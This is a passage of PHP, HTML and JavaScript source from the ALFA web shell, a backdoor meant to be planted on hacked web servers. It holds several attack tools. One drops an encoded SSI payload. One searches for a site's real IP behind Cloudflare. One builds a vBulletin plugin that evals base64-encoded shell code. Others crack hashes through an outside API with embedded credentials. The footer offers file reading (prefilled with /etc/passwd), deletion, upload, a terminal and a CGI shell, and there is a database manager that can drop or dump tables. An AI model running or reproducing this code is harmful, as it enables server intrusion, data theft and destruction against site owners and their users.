AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
2142@__write_file('alfa_ssi.shtml',__get_resource($code));
2143@chmod("alfa_ssi.shtml",0755);
2144echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
2145echo '</div>';
2146alfafooter();
2147}
2148function alfacloudflare(){
2149alfahead();
2150AlfaNum(8,9,10,7,6,5,4,3);
2151echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
2152<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
2153if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
2154$url = $_POST['alfa1'];
2155if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
2156$url = preg_replace('/^(https?):\/\//', '', $url);
2157$url = "http://www.".$url;
2158}
2159$headers = @get_headers($url, 1);
2160$server = $headers['Server'];
2161$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
2162if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
2163if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
2164$url = explode($matches[0], $url);
2165$url = $url[1];}}
2166if(is_array($server))$server = $server[0];
2167echo __pre();
2168if(preg_match('/cloudflare/i', $server))
2169echo "\n[+] CloudFlare detected: {$server}\n<br>";
2170else
2171echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
2172echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
2173echo "[+] Searching for more IP addresses.\n\n<br><br>";
2174for($x=0;$x<count($subs);$x++){
2175$site = $subs[$x] . $url;
2176$ip = is_ipv4(gethostbyname($site));
2177if($ip == '(Null)')
2178continue;
2179echo "Trying {$site}: {$ip}\n<br>";
2180}
2181echo "\n[+] Finished.\n<br>";
2182}
2183echo '</div>';
2184alfafooter();
2185}
2186function is_ipv4($ip){
2187return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
2188}
2189function __alert($s){
2190echo '<center>'.__pre().$s.'</center>';
2191}
2192function create_table($data){
2193echo '<table border="1">';
2194foreach ($data as $key => $val){
2195$array = array();
2196foreach($val as $k => $v){
2197$array[$k] = $v;
2198}
2199echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
2200}
2201echo '</table>';
2202}
2203function alfaphp2xml(){
2204alfahead();
2205AlfaNum(8,9,10,7,6,5,4,3);
2206echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
2207<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2208<input type='submit' name='go' value=' ' /></p></form></center>";
2209if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
2210echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
2211echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
2212echo '</textarea></center></p>';
2213}
2214echo '</center></div>';
2215alfafooter();
2216}
2217function alfacpcrack(){
2218alfahead();
2219echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
2220if($_POST['alfa1']=='dec'){
2221$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
2222echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
2223<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
2224foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
2225echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2226if($_POST['alfa3'] == '>>'){
2227$hash = $_POST['alfa2'];
2228if(!empty($hash)){
2229$hash_type = $_POST['alfa4'];
2230$email = "solevisible@gmail.com";
2231$code = "7b9fa79f92c3cd96";
2232$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
2233$resp = @file_get_contents($target);
2234if($resp==''){
2235$get = new AlfaCURL();
2236$resp = $get->Send($target);
2237}
2238echo __pre().'<center>';
2239switch($resp){
2240 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
2241 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
2242 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
2243 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
2244}
2245if(substr($resp,0,4)!='CODE'&&$resp!=''){
2246echo "<b>Result: <font color='green'>".$resp."</font></b>";
2247}elseif(substr($resp,0,4)!='CODE'){
2248echo "<font color='red'>NoT Found</font><br />";
2249}
2250echo('</center>');
2251}
2252}
2253}
2254if($_POST['alfa1']=='analyzer'){
2255echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
2256<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
2257<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2258if($_POST['alfa3'] == '>>'){
2259$hash = $_POST['alfa2'];
2260if(!empty($hash)){
2261$curl = new AlfaCURL();
2262$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
2263echo(__pre().'<center>');
2264if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
2265 echo('<font color="green">'.$s[1].'</font>');
2266}else{
2267 echo('<font color="red">Not Found...!</font>');
2268}
2269echo('</center><br>');
2270}
2271}
2272}
2273echo '</div>';
2274alfafooter();
2275}
2276function alfafooter(){
2277if(!isset($_POST['ajax'])){
2278echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
2279<tr>
2280<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
2281<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
2282<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
2283<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
2284</tr>
2285<tr>
2286<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
2287<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
2288</tr>
2289<tr>
2290<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
2291</tr>
2292<tr>
2293<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
2294<input type='hidden' name='a' value='FilesMAn'>
2295<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
2296<input type='hidden' name='ajax' value='true'>
2297<input type='hidden' name='alfa1' value='uploadFile'>
2298<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
2299<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></div></td>
2300</tr>
2301</table>
2302</div>
2303
2304<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>
2305
2306<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>
2307
2308<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
2309<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
2310<div id='update-content'></div>
2311<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
2312<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
2313<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
2314<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
2315<div id='rightclick_menu'>
2316 <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
2317 <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
2318 <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
2319 <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
2320 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
2321 <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
2322 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
2323 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
2324 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\"> Rename</a>
2325 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\"> Modify</a>
2326 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
2327 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
2328 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
2329 <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
2330</div>
2331<div id=\"filesman-tab-full-path\"></div>
2332<div id='alert-area' class='alert-area'></div>
2333<div class='cl-popup-fixed' style='display:none;'>
2334 <div id='shortcutMenu-holder'>
2335 <div class='popup-head'></div>
2336 <form autocomplete='off' onSubmit='return false;'>
2337 <label class='old-path-lbl'></label>
2338 <div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
2339 <label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
2340 <input type='text' name='fname'>
2341 <div class='perm-table-holder'>
2342 <table>
2343 <tbody>
2344 <tr>
2345 <td><b>Mode</b></td>
2346 <td>User</td>
2347 <td>Group</td>
2348 <td>World</td>
2349 </tr>
2350 <tr>
2351 <td>Read</td>
2352 <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
2353 <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
2354 <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
2355 </tr>
2356 <tr>
2357 <td>Write</td>
2358 <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
2359 <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
2360 <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
2361 </tr>
2362 <tr>
2363 <td>Execute</td>
2364 <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
2365 <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
2366 <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
2367 </tr>
2368 <tr>
2369 <td>Permission</td>
2370 <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
2371 <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
2372 <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
2373 </tr>
2374 </tbody>
2375 </table>
2376 </div>
2377
2378 </form>
2379 <div class='popup-foot'>
2380 <button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
2381 <button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
2382 </div>
2383 </div>
2384</div>";?>
2385<script>
2386function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'> <a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":" ")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="<<",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML=">>",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>></option><option value='>='>>=</option><option value='<'><</option><option value='<='><=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input 